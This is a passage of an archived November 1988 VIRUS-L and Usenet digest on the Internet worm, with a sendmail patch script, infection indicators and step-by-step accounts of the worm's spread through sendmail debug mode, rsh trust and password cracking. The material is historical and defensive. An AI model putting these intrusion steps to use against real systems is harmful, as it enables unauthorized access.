  708.         your strings(1) command prints out locations in decimal, else
  709.         it's octal.
  710.  
  711.         The patch script for sendmail.  NOTE, YOUR OFFSETS MAY VARY!!
  712.         This script assumes that your strings(1) command prints out
  713.         the offsets in decimal.
  714.  
  715.                 Script started on Thu Nov  3 02:08:14 1988
  716.                 okeeffe:tmp {2} strings -o -a /usr/lib/sendmail | egrep debug
  717.                 0096972 debug
  718.                 okeeffe:tmp {3} adb -w /usr/lib/sendmail
  719.                 ?m 0 0xffffffff 0
  720.                 0t10$d
  721.                 radix=10 base ten
  722.                 96972?s
  723.                 96972:          debug
  724.                 96972?w 0
  725.                 96972:          25701   =       0
  726.                 okeeffe:tmp {4} ^D
  727.                 script done on Thu Nov  3 02:09:31 1988
  728.  
  729.         If your strings(1) command prints out the offsets in octal,
  730.         change the line "0t10$d" to "0t8$d".
  731.  
  732.         After you've fixed sendmail, move both /bin/cc and /bin/ld to
  733.         something else.  (The virus uses the cc and the ld commands
  734.         to rebuild itself to run on your system.)
  735.  
  736.         Finally, kill any processes on your system that don't belong there.
  737.         Suspicious ones have "(sh)" or "xNNNNNNN" where the N's are random
  738.         digits, as the command name on the ps(1) output line.
  739.  
  740.         One more thing, if you find files in /tmp or /usr/tmp that
  741.         have names like "xNNNNNN,l1.c", or "xNNNNNN,sun3.o", or
  742.         "xNNNNNNN,vax.o" where the N's are random digits, you've been
  743.         infected.
  744.  
  745. From news@cs.purdue.EDU (News Knower) Thu Nov  3 14:58:27 1988
  746. Path: topaz.rutgers.edu!aramis.rutgers.edu!rutgers!mailrus!purdue!news
  747. From: news@cs.purdue.EDU (News Knower)
  748. Newsgroups: news.announce.important,news.sysadmin
  749. Subject: Re: The virus
  750. Message-ID: <5311@medusa.cs.purdue.edu>
  751. Date: 3 Nov 88 19:58:27 GMT
  752. Followup-To: news.sysadmin
  753. Organization: Department of Computer Science, Purdue University
  754. Lines: 24
  755. Approved: news@cs.purdue.EDU
  756. Xref: topaz.rutgers.edu news.announce.important:22 news.sysadmin:1283
  757.  
  758. The patch from Keith Bostic in the last message is *not* sufficient to
  759. halt the spread of the virus.  We have discovered from looking at the
  760. binaries that the virus also attempts to spread itself via "rsh"
  761. commands to other machines.  It looks through a *lot* of files to find
  762. possible vectors to spread.
  763.  
  764. If you have a bunch of machines with hosts.equiv set or .rhosts files,
  765. you should shut them *all* down at the same time after you have fixed
  766. sendmail to prevent a further infestation.  If you don't clear out
  767. the versions in memory, you won't protect your other machines.
  768.  
  769. The virus runs itself with the name "sh" and then overwrites argv,
  770. so if a "ps ax" shows any processes named "(sh)" without a controlling
  771. tty, you have a problem.  Due to the use of other uids from rsh,
  772. don't make any conclusions if the uid is one of your normal users.
  773.  
  774. Also, check your mailq (do a mailq command).  If you see any entries
  775. that pipe themselves through sed and sh, delete them from the queue
  776. before you restart your machines.
  777.  
  778. Non-internet sites do not need to worry about this virus (for now!),
  779. but be aware that mail and news may not be flowing everywhere for some
  780. time -- many sites are disconnecting from the Internet completely
  781. until the virus is contained.
  782.  
  783. --------------------------------------------------
  784. This appears to be limited to Internet sites, but may also hit bitnet, i
  785. suppose.
  786. Mark
  787. ----
  788. Mark Smith (alias Smitty) "Be careful when looking into the distance,
  789. RPO 1604; P.O. Box 5063  that you do not miss what is right under your nose."
  790. New Brunswick, NJ 08903-5063    {backbone}!rutgers!topaz.rutgers.edu!msmith
  791. msmith@topaz.rutgers.edu      Dukakis/Bentsen on Nov. 8th!!!
  792. =========================================================================
  793. Date:         Thu, 3 Nov 88 17:14:00 EST
  794. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  795. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  796. From:         I hate mailers that wrap lines <JEN@VTCS1>
  797. Subject:      University of Arizona hit by a virus.
  798.  
  799. The following message was forwarded to me from the LINKFAIL distribution list.
  800. Does anyone have details on the exact problem the University of Arizona is
  801. experiencing?
  802.  
  803. --- Begin forwarded message
  804. From:   BITNET%"KHAAV@ASUACAD"  3-NOV-1988 16:16
  805. To:     POSTMASTER
  806. Subj:   University of Arizona down
  807.  
  808. Received: From VTVM2(MAILER) by VTCS1 with Jnet id 7149
  809.           for POSTMASTER@VTCS1; Thu,  3 Nov 88 16:16 EST
  810. Received: by VTVM2 (Mailer X1.25) id 7132; Thu, 03 Nov 88 16:22:18 EST
  811. Date:         Thu, 3 Nov 88 12:11:38 MST
  812. Reply-To:     Bob Kaneshige <KHAAV@ASUACAD>
  813. Sender:       Link failure announcements <LINKFAIL@BITNIC>
  814. From:         Bob Kaneshige <KHAAV@ASUACAD>
  815. Subject:      University of Arizona down
  816. To:           "Ron Jarrell (Virginia Tech (VPI))" <POSTMAST@VTCS1>
  817.  
  818. All  Bitnet access to the  U of Arizona  campus has been suspended until
  819. this afternoon due to a virus attack.  This includes the following nodes:
  820. ARIZRVAX, ARIZJVAX, ARIZVM1, & ARIZMIS.
  821.  
  822. --- End forwarded message
  823.  
  824. -Jeff E. Nelson
  825. -Virginia Polytechnic Institute and State University
  826. -INTERNET:  jen@vtcs1.cs.vt.edu
  827. -BITNET:    jen@vtcs1.bitnet
  828. =========================================================================
  829. Date:         Thu, 3 Nov 88 19:32:33 EST
  830. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  831. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  832. From:         Bob Babcock <PEPRBV@CFAAMP>
  833. Subject:      Unix virus
  834.  
  835. My office mate received this from another mailing list; looks like
  836. it should be of interest here:
  837.  
  838. >Date:         Thu, 3 Nov 88 10:11:37 EST
  839. >Reply-To:     Network Sites Liaison <LIAISON@MARIST>
  840. >Sender:       Network Sites Liaison <LIAISON@MARIST>
  841. >From:         Ross Patterson <A024012@RUTVM1>
  842. >Subject:      Unix virus, beware
  843. >To:           "John F. Chandler" <PEPMNT@CFAAMP>
  844. >
  845. >    Just  a brief  note to  warn  system managers  of 4.xBSD  systems,
  846. >particularly Suns  and VAXen, that there  is a virus in  the air.  The
  847. >fix has been posted  to NetNews newsgroup "comp.sys.4bsd.ucb-fixes" by
  848. >Keith Bostick, UC  Berkeley.  For your system to be  affected, it must
  849. >be running TCP/IP.  The virus  propagates via mail (using the SENDMAIL
  850. >daemon) and  RSH.  We're stomping  it out  here at Rutgers,  using the
  851. >Bostick's suggestions.  Happy hunting.
  852. >
  853. >Ross Patterson
  854. >Rutgers University
  855. >Center for Computer and Information Services
  856. >Systems Programming
  857. =========================================================================
  858. Date:         Thu, 3 Nov 88 19:59:00 EST
  859. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  860. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  861. From:         ACS045@GMUVAX
  862. Subject:      PRIMOS virus
  863.  
  864. Does anybody out there know of any virii either old or new that would infect
  865. a ring-network of PR1ME computers running PRIMOS?---any confirmations/denials
  866. /info would be greatly appreciated(One question I seem to have forgotten to ask
  867. at the Conference when I had the chance)
  868. ---Steve
  869. =========================================================================
  870. Date:         Thu, 3 Nov 88 21:31:46 CST
  871. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  872. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  873. From:         James Ford <JFORD1@UA1VM>
  874. Subject:      Bitnet bug
  875.  
  876. Text taken from LINKFAIL.  Also, the TCPIP bug that
  877. apparently is going around made CNN news.
  878.  
  879. CNN stated that the FBI is going to investigate the matter.  My question
  880. is can the FBI trace something like this?  The XMAS bug was traced via
  881. old NETLOG files and among other things.............
  882.  
  883.                           JF
  884. ----------------------------------------------------------------------
  885. >Date:         Thu, 3 Nov 88 12:11:38 MST
  886. >Sender:       Link failure announcements <LINKFAIL@UGA>
  887.  
  888. >All  Bitnet access to the  U of Arizona  campus has been suspended until
  889. >this afternoon due to a virus attack. This includes the following nodes:
  890. >ARIZRVAX, ARIZJVAX, ARIZVM1, & ARIZMIS.
  891. =========================================================================
  892. Date:         Fri, 4 Nov 88 09:08:02 EST
  893. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  894. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  895. From:         "David A. Bader" <DAB3@LEHIGH>
  896. Subject:      CHECKUP 1.8
  897.  
  898. A number of people have sent me flames because I did not specify what
  899. machine I was working with when I mentioned Checkup 1.8.. I apologize,
  900. it is written for an IBM Microcomputer type system.
  901.    -David Bader
  902.    DAB3@LEHIGH
  903. =========================================================================
  904. Date:         Fri, 4 Nov 88 09:47:06 EST
  905. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  906. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  907. From:         Joe McMahon <XRJDM@SCFVM>
  908. Subject:      Internet worm: it's a failure
  909.  
  910. The Internet worm released sometime in the last few days was a failure.
  911.  
  912. Why? An analogy is in order. A contagious disease is not a success when
  913. it kills or shows up quickly. A cold is more "successful" than the plague.
  914.  
  915. The Internet worm (or perhaps bacterium? the terminology is slippery
  916. here) reproduced itself quickly, and made interconnections, like a
  917. worm. The failure, however, was in that reinfections did not detect
  918. one another.
  919.  
  920. Just as an interesting idea, what would have happened if the worm
  921. had been able to detect reinfections? Spread would have been at about
  922. the same rate, perhaps even faster. Worse, however, would be the fact
  923. that a huge worm with very small segments would be hiding in all of
  924. these machines. A single extra process would be hard to detect.
  925.  
  926. Now, after a day or so, one segment of the worm broadcasts 'RM *' or
  927. some other nasty operation (I'm not a Unix person, fill in the command
  928. with your favorite dangerous operation) ...
  929.  
  930. --- Joe M.
  931. =========================================================================
  932. Date:         Fri, 4 Nov 88 09:36:00 EDT
  933. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  934. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  935. From:         NEWTON@NBSENH
  936. Subject:      Internet Virus
  937.  
  938. The Internet virus made the front page of the Washington Post, with
  939. considerable discussion and artwork on the inside pages.  Looked to me
  940. as if they had prepared themselves relatively well for the next major
  941. virus outbreak.
  942. =========================================================================
  943. Date:         Fri, 4 Nov 88 10:10:00 LCL
  944. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  945. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  946. From:         "Good for practical purposes,
  947.               at least theoretically" <herbison%ultra.DEC@DECWRL.DEC.COM>
  948. Subject:      Disagreement over FEV definition
  949.  
  950.         Some comments taken from some recent VIRUS-L submissions:
  951.  
  952. > I should think that such a naming convention could be pretty useful
  953. > whereby an EEV would be attributable to (presumably) a system programming
  954. > error, and an FEV would be attributable to a system design deficiency.
  955.  
  956.  
  957. > I'd also think that EEVs would be more prevalent on micros since there
  958. > is no facility for memory protection, etc.
  959.  
  960.  
  961.         Since a feature of most micros is no memory protection (and very
  962.         little real protection of any sort), I consider most micro
  963.         viruses to be FEVs.  If a micro had a buggy implementation of
  964.         memory protection, than a virus that used a bug in the memory
  965.         protection would be an EEV.  As it is, most micro are just
  966.         exploiting design deficiencies (the definition above of an FEV).
  967.  
  968.                             B.J.
  969. =========================================================================
  970. Date:         Fri, 4 Nov 88 11:13:13 EST
  971. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  972. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  973. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  974. Subject:      Comments from RISKS forum about Internet virus
  975.  
  976. There was (what seemed to be) a good description of the recent
  977. Internet virus in today's RISKS forum.  The following is a reprint of
  978. the relevant messages for those of you who don't get RISKS:
  979.  
  980.  
  981. Date:         Thu, 3 Nov 88 15:52:10 PST
  982. From:         RISKS FORUM <RISKS@KL.SRI.COM>
  983. Subject:      RISKS DIGEST 7.69
  984.  
  985. RISKS-LIST: RISKS-FORUM Digest  Thursday 3 November 1988   Volume 7 : Issue 69
  986.  
  987. Contents:
  988.   Virus on the Arpanet - Milnet (Cliff Stoll)
  989.   More on the virus (Gene Spafford, PGN, Matt Bishop)
  990.  
  991. ----------------------------------------------------------------------
  992. Date:  Thu, 3 Nov 88 06:46 EST
  993. From: Stoll@DOCKMASTER.ARPA
  994. Subject:  Virus on the Arpanet - Milnet
  995.  
  996. Re Arpanet "Sendmail" Virus attack November 3, 1988
  997.  
  998. Hi Gang!
  999.  
  1000. It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't believe
  1001. everything that follows...
  1002.  
  1003. Apparently, there is a massive attack on Unix systems going on right now.
  1004.  
  1005. I have spoken to systems managers at several computers, on both the east
  1006. & west coast, and I suspect this may be a system wide problem.
  1007.  
  1008. Symptom:  hundreds or thousands of jobs start running on a Unix system
  1009. bringing response to zero.
  1010.  
  1011. Systems attacked:  Unix systems, 4.3BSD unix & variants (eg:  SUNs) any
  1012. sendmail compiled with debug has this problem.  See below.
  1013.  
  1014. This virus is spreading very quickly over the Milnet.  Within the past 4
  1015. hours, I have evidence that it has hit >10 sites across the country,
  1016. both Arpanet and Milnet sites.  I suspect that well over 50 sites have
  1017. been hit.  Most of these are "major" sites and gateways.
  1018.  
  1019.  
  1020. Method:
  1021.  
  1022. Apparently, someone has written a program that uses a hole in SMTP
  1023. Sendmail utility.  This utility can send a message into another program.
  1024.  
  1025. Step 1:  from a distant Milnet host, a message is sent to Sendmail
  1026.        to fire up SED, (SED is an editor)  This is possible in certain
  1027.        versions of sendmail (see below).
  1028.  
  1029. 2:  A 99 line C program is sent to SED through Sendmail.
  1030.  
  1031. 3:  The distant computer sends a command to compile this C program.
  1032.  
  1033. 4:  Several object files are copied into the Unix computer.
  1034.         There are 3 files:  one targeted to Sun
  1035.                             one targeted to SUN-3
  1036.                             one targeted to vax    (ultrix probably, not vms)
  1037.  
  1038. 5:  The C program accepts as address other Milnet sites
  1039.  
  1040. 6:  Apparently, program scans for other Milnet/arpanet addresses and
  1041.      repeats this process.
  1042.  
  1043.  
  1044.  
  1045. The bug in Sendmail:
  1046.  
  1047. When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
  1048. option, there's a hole in it.
  1049.  
  1050. Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
  1051. It exists only where the system manager recompiled Sendmail and enabled
  1052. debugging.
  1053.  
  1054.  
  1055. This is bad news.
  1056.  
  1057.   Cliff Stoll dockmaster.arpa
  1058.  
  1059. ------------------------------
  1060.  
  1061. Date: Thu, 03 Nov 88 09:52:18 EST
  1062. From: Gene Spafford <spaf@purdue.edu>
  1063. Subject: More on the virus
  1064. Organization: SERC, Department of Computer Sciences, Purdue Univ.
  1065.  
  1066. All of our Vaxen and some of our Suns here were infected with the virus.  The
  1067. virus forks repeated copies of itself as it tries to spread itself, and the
  1068. load averages on the infected machines skyrocketed.  In fact, it got to the
  1069. point that some of the machines ran out of swap space and kernel table entries,
  1070. preventing login to even see what was going on!
  1071.  
  1072. The virus seems to consist of two parts.  I managed to grab the source code for
  1073. one part, but not the main component (the virus cleans up after itself so as
  1074. not to leave evidence).  The way that it works is as follows:
  1075.  
  1076. 1) Virus running on an infected machine opens a TCP connection to a
  1077. victim machine's sendmail, invokes debug mode, and gets a shell.
  1078.  
  1079. 2) The shell creates a file in /tmp named $$,l1.c (where the $$ gets replaced
  1080.  
  1081. by the current process id) and copies code for a "listener" or "helper"
  1082. program.  This is just a few dozen lines long and fairly generic code.  The
  1083. shell compiles this helper using the "cc" command local to the system.
  1084.  
  1085. 3) The helper is invoked with arguments pointing back at the infecting
  1086. virus (giving hostid/socket/passwords as arguments).
  1087.  
  1088. 4) The helper then connects to the "server" and copies a number of files
  1089. (presumably to /tmp).  After the files are copied, it exec's a shell with
  1090. standard input coming from the infecting virus program on the other end of the
  1091. socket.
  1092.  
  1093. From here, I speculate on what happens since I can't find the source to
  1094. this part lying around on our machines:
  1095.  
  1096. 5) The newly exec'd shell attempts to compile itself from the files copied over
  1097. to the target machine.  I'm not sure what else the virus does, if anything --
  1098. it may also be attempting to add a bogus passwd file entry or do something to
  1099. the file system.  The helper program has an array of 20 filenames for the
  1100. "helper" to copy over, so there is room to spare.  There are two versions
  1101. copied -- a version for Vax BSD and a version for SunOS; the appropriate one is
  1102. compiled.
  1103.  
  1104. 6) The new virus is dispatched.  This virus opens all the virus source
  1105. files, then unlinks the files so they can't be found (since it has them
  1106. open, however, it can still access the contents).  Next, the virus
  1107. steps through the hosts file (on the Sun, it uses YP to step through
  1108. the distributed hosts file) trying to connect to other machines'
  1109. sendmail.  If a connection succeeds, it forks a child process to infect
  1110. it, while the parent continues to attempt infection of other machines.
  1111.  
  1112. 7) The child requests and initializes a new socket, then builds and invokes a
  1113. listener with the new socket number and hostid as arguments (#1, above).
  1114.  
  1115. The heavy load we see is the result of multiple viruses coming in from multiple
  1116. sites.  Since local hosts files tend to have entries for other local hosts, the
  1117. virus tends to infect local machines multiple times -- in some senses this is
  1118. lucky since it helps prevent the spread of the virus as the local machines slow
  1119. down.
  1120.  
  1121. The virus also "cleans" up after itself.  If you reboot an infected machine (or
  1122. it crashes), the /tmp directory is normally cleaned up on reboot.  The other
  1123. incriminating files were already deleted by the virus itself.
  1124.  
  1125. Clever, nasty, and definitely anti-social.
  1126.  
  1127. --spaf
  1128.  
  1129. ------------------------------
  1130.  
  1131. Date: Thu, 3 Nov 1988 14:27:22 PDT
  1132. From: Peter Neumann <neumann@csl.sri.com>
  1133. Subject: More on the virus attack
  1134.  
  1135. Remember that the above are preliminary messages relating to an event in
  1136. progress.  There seem to be many unanswered questions.  Perhaps someone will
  1137. contribute a definitive report to the next issue of RISKS.
  1138.  
  1139. Examination of the code suggests a fairly sophisticated person writing
  1140. relatively high quality (although undocumented) code, exploiting several flaws
  1141. that exist(ed) on many UNIX systems, and written with considerable good
  1142. practice in self-checking, reliability, etc.  From the evidence thus far, I
  1143. would guess it that this was a deliberate attack, not an accidental experiment
  1144. run astray.
  1145.  
  1146. Although it was primarily a denial of service attack, it did some remarkable
  1147. things, taking advantage of many different approaches.  The spawned
  1148. processes appear to have been doing attacks on encrypted passwords to enable
  1149. ftps (in case the .rhost attack would not work -- cf. the Stanford breakins
  1150. described in CACM and SEN by Brian Reid).  Separate versions to run on Suns
  1151. and Vaxens were apparently propagated in DES encrypted form, decrypted, and
  1152. both programs tried to see which one would work.
  1153.  
  1154. We quoted Henry Petroski here over a year ago to the effect that we do not
  1155. learn from our successes, but that we have an opportunity to learn from our
  1156. failures.  Once again we are presented with the opportunity to learn that many
  1157. of our computer systems have serious security vulnerabilities, and that we need
  1158. to take pains to defend against the really malicious attacks.  Strangely some
  1159. people take heart in the fact that the security attacks to date (whether
  1160. penetrations, exploitations of privilege, Trojan horses, or legitimate viruses)
  1161. have been relatively modest in scale, perhaps to justify the absence of
  1162. concern.  I am afraid that it will take a Chernobyl- or Three-Mile-Island-like
  1163. disaster before the community at large wakes up.  PGN
  1164.  
  1165. ------------------------------
  1166.  
  1167. Date: Thu, 3 Nov 88 16:32:25 EST
  1168. From: bishop@bear.Dartmouth.EDU (Matt Bishop)
  1169. Subject: More on the virus
  1170.  
  1171. ...  This program introduced itself through a bug in sendmail.  At these sites,
  1172. sendmail was compiled and installed with a debugging option turned on.  As near
  1173. as I can figure (I don't have access to the sendmail sources), by giving a
  1174. specific option to the "debug" command in sendmail (there are lots of those,
  1175. controlling what exactly you get information about) you can cause it to execute
  1176. a command.  As sendmail runs setuid to root, guess what privileges the command
  1177. is executed with.  Right.
  1178.    Apparently what the attacker did was this:  he or she connected to sendmail
  1179. (ie, telnet victim.machine 25), issued the appropriate debug command, and had
  1180. a small C program compiled.  (We have it.  Big deal.)  This program took
  1181. as an argument a host number, and copied two programs -- one ending in
  1182. q.vax.o and the other ending in .sun.o -- and tried to load and execute them.
  1183. In those cases where the load and execution succeeded, the worm did two things
  1184. (at least):  spawn a lot of shells that did nothing but clog the process table
  1185. and burn CPU cycles; look in two places -- the password file and the internet
  1186. services file -- for other sites it could connect to (this is hearsay, but I
  1187. don't doubt it for a minute.)  It used both individual .rhost files (which it
  1188. found using the password file), and any other remote hosts it could locate
  1189. which it had a chance of connecting to.  It may have done more; one of our
  1190. machines had a changed superuser password, but because of other factors we're
  1191. not sure this worm did it.
  1192.    This last part is still sketchy; I have the relevant sun.o file and will
  1193. take it apart to see just what it was supposed to do.  As of now, it appears
  1194. there was no serious damage (just wasted CPU cycles and system administrator
  1195. time).
  1196.    Two obvious points:
  1197. 1.  Whoever did this picked only on suns and vaxen.  One site with a lot
  1198.     of IRISes and two Crays (ie, NASA Ames) got bit on their Suns and Vaxen,
  1199.     but the attempt to get the other machines didn't work.
  1200. 2.  This shows the sorry state of software and security in the UNIX world.
  1201.     People should NEVER put a program with debugging hooks in it, especially
  1202.     when the hook is (or can be made) to execute an arbitrary command.  But
  1203.     that is how the sendmail which was used was distributed!
  1204.    One more interesting point:  initially, I thought an application of the
  1205. "principle of least privilege" would have prevented this penetration.  But
  1206. the attacker used a world-writeable directory to squirrel the relevant programs
  1207. in, so -- in effect -- everything could have been done by any user on the
  1208. system!  (Except the superuser password change, of course -- if this worm
  1209. did in fact do it.)
  1210.    I think the only way to prevent such an attack would have been to turn
  1211. off the deug option on sendmail; then the penetration would fail.  It goes to
  1212. show that if the computer is not secure (and like you, I don't believe there
  1213. ever will be such a beastie), there is simply no way to prevent a virus (or,
  1214. in this case, a worm) from getting into that system.
  1215.    I know this is somewhat sketchy, flabby, and fuzzy, but it's all I know
  1216. so far.  I'll keep you posted on developments ...
  1217.  
  1218. Matt
  1219.  
  1220.  
  1221.  
  1222. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  1223. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  1224. Lehigh University Computing Center        coffee table?!
  1225. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  1226. BITNET:   <LUKEN@LEHIIBM1>                question?
  1227. =========================================================================
  1228. Date:         Fri, 4 Nov 88 10:44:40 CST
  1229. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1230. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1231. From:         Kevin Trojanowski <troj@UMAXC.WEEG.UIOWA.EDU>
  1232. Subject:      RE: PRIMOS virus
  1233.  
  1234.  
  1235. Here at the University of Iowa, we're running a 5 Prime 9955s in a ring-net;
  1236. and to the best of my knowledge (here at least) no viruses have infiltrated
  1237. the system.
  1238.  
  1239. This, of course, doesn't mean that they don't exist; tho I hope that none do.
  1240.  
  1241. If anyone has any information on one, I too would be interested in hearing
  1242. about it.
  1243.  
  1244. -Kevin Trojanowski
  1245.  troj@umaxc.weeg.uiowa.edu
  1246. =========================================================================
  1247. Date:         Fri, 4 Nov 88 08:32:00 MDT
  1248. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1249. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1250. From:         "DOV - DR. ART ST. GEORGE" <STGEORGE@UNMB>
  1251.  
  1252. From:   GOV%"yee@AMES.ARC.NASA.GOV"      "Peter E. Yee"  3-NOV-1988 03:32
  1253. To:     "(no name)" <STGEORGE@UNMB>
  1254. Subj:   Internet VIRUS alert
  1255.  
  1256. Received: From USCVM(MAILER) by UNMB with Jnet id 6259
  1257.           for STGEORGE@UNMB; Thu,  3 Nov 88 03:32 MDT
  1258. Received: by USCVM (Mailer X1.25) id 6256; Thu, 03 Nov 88 02:31:46 PST
  1259. Date:         Wed, 2 Nov 88 23:28:00 PST
  1260. Reply-To:     <TCP-IP@SRI-NIC.ARPA>
  1261. Sender:       "(TCP-IP ARPA Discussions)" <TCPIP-L@USCVM>
  1262. Comments:     Warning -- original Sender: tag was TCPIP-L@BYUADMIN
  1263. From:         "Peter E. Yee" <yee@AMES.ARC.NASA.GOV>
  1264. Subject:      Internet VIRUS alert
  1265. X-To:         mkl@sri-nic.arpa
  1266. X-cc:         postmaster@sri-nic.arpa, tcp-ip@sri-nic.arpa
  1267. To:           "(no name)" <STGEORGE@UNMB>
  1268.  
  1269. We are currently under attack from an Internet VIRUS.  It has hit UC Berkeley,
  1270. UC San Diego, Lawrence Livermore, Stanford, and NASA Ames.  The virus comes in
  1271. via SMTP, and then is able to attack all 4.3BSD and SUN (3.X?) machines.  It
  1272. sends a RCPT TO that requests that its data be piped through a shell.  It copies
  1273. in a program, compiles and executes it.  This program copies in VAX and SUN
  1274. binaries that try to replicate the virus via connections to TELNETD, FTPD,
  1275. FINGERD, RSHD, and SMTP.  The programs also appear to have DES tables in them.
  1276. They appear in /usr/tmp as files that start with the letter x.  Removing them
  1277. is not enough as they will come back in the next wave of attacks.  For now
  1278. turning off the above services seems to be the only help.  The virus is able
  1279. to take advantage of .rhosts files and hosts.equiv.  We are not certain what the
  1280. final result of the binaries is, hence the warning.
  1281.  
  1282. I can be contacted at (415) 642-7447.  Phil Lapsley and Kurt Pires at this
  1283. number are also conversant with the virus.
  1284.  
  1285.                             -Peter Yee
  1286.                             yee@ames.arc.nasa.go
  1287.                             ames!yee
  1288. =========================================================================
  1289. Date:         Fri, 4 Nov 88 11:07:00 EST
  1290. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1291. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1292. From:         Jim Shaffer <SHAFFERJ@BKNLVMS>
  1293. Subject:      Arizona's virus
  1294.  
  1295. Does anyone have any more information on the virus they had at the U. of
  1296. Arizona yesterday?
  1297. =========================================================================
  1298. Date:         Fri, 4 Nov 88 11:36:03 EST
  1299. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1300. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1301. From:         John Hammond <MAIL@UCONNVM>
  1302. Subject:      Latest Virus in the News
  1303.  
  1304. Has anyone heard about the current virus in the news?  Specifically,
  1305. is it a virus designed for VM/CMS systems?
  1306.  
  1307. John Hammond (Techrep)
  1308. University Computer Center
  1309. University of Connecticut
  1310. U-138, 196 Auditorium Road
  1311. Storrs, Connecticut  06269-3138
  1312. U.S.A.    Phone: (203) 486-4022
  1313. =========================================================================
  1314. Date:         Fri, 4 Nov 88 13:39:03 EST
  1315. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1316. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1317. From:         Loren K Keim   -- Lehigh University <LKK0@LEHIGH>
  1318. Subject:      New Virus Problems
  1319.  
  1320. Y'know, a few weeks ago, I was talking to the press in London
  1321. explaining that we were going to see some serious viruses hitting
  1322. late this year and early next year.  I told them that we'd be
  1323. seeing some major mainframe viruses which could propogate across
  1324. networks.   Particularly, we're going to have to watch for
  1325. Unix and VMS viruses coming down the line, and eventually
  1326. someone's going to attack VM/CMS systems and banking systems.
  1327. One reporter acted srurprized.  He told me that they had been
  1328. reporting viruses for some time, and no one has told them
  1329. that something could possibly affect their mainframes.
  1330. Dont be fooled by the fact that mainframes are more compelex
  1331. pieces of machinery, be very wary of these viruses because
  1332. I believe they will be more harmful to the general populance.
  1333. I honestly think more research, more important banking
  1334. information, accounting and so forth is done on mainframes
  1335. currently.   We have to stp hthis type of propagation.
  1336.  
  1337. We are currently tracing the Internet Virus backawards.
  1338. If you have been hit by the virus, please send me mail
  1339. at LKK0@lehigh and tell me where you are, what you direct
  1340. nodes you're comnnecteed to, and approx when you were
  1341. first hit.
  1342.  
  1343. %There are rumors flying far and whide that a VM/CMS virus
  1344. is invading systems at this time.  I haven't seen oit or
  1345. seen any reliable info on it.  If you know ANYTHING about
  1346. it, please conntact me.
  1347.  
  1348. If you have an emergency need to get ahold of me, here are
  1349. some numbers to track me down:
  1350.  
  1351. My new house:   432-2932  (215 area code)
  1352. My main office: 395-0393  (215)
  1353.  
  1354. Thank oyou and good luck in the war!
  1355.  
  1356. Loren Keim
  1357. =========================================================================
  1358. Date:         Fri, 4 Nov 88 12:51:44 CDT
  1359. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1360. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1361. From:         Len Levine <len@EVAX.MILW.WISC.EDU>
  1362. Subject:      Unix virus
  1363.  
  1364. The unix virus enters systems through sendmail and, using the debug
  1365. feature, and a machine specific program, tries to crack
  1366. userid/passwords using the system spell check dictionary.
  1367.  
  1368. If it does crack a user, then the virus "logs in" as that user and
  1369. sends copies of itself to other machines.
  1370.  
  1371. The time spent in cracking the password file causes the demand to rise
  1372. to a very large number and makes the machine unusable.
  1373.  
  1374. No user files seem to have been hit, although the virus could have
  1375. deleted the users data sets.
  1376.  
  1377. No break into operating system levels seems to have occurred.
  1378.  
  1379. I am sure that we will hear more about this, it made the NY Times this
  1380. morning.
  1381.  
  1382. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  1383. | Leonard P. Levine               e-mail len@evax.milw.wisc.edu |
  1384. | Professor, Computer Science             Office (414) 229-5170 |
  1385. | University of Wisconsin-Milwaukee       Home   (414) 962-4719 |
  1386. | Milwaukee, WI 53201 U.S.A.              Modem  (414) 962-6228 |
  1387. + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +
  1388. =========================================================================
  1389. Date:         Fri, 4 Nov 88 14:50:57 EDT
  1390. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  1391. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  1392. From:         Scott Earley <SCOTT@BITNIC>
  1393. Subject:      re: Disagreement over FEV definition
  1394.  
  1395. This died and went to POSTMAST@BITNIC, so I'm resending it for B.J.
  1396.  
  1397. --------original message--------
  1398. >Sender:      Virus Discussion List <VIRUS-L@LEHIIBM1>
  1399. >From:        "Good for practical purposes,
  1400. >             at least theoretically" <herbison%ultra.DEC@DECWRL.DEC.COM>
  1401. >Subject:     Disagreement over FEV definition
  1402.  
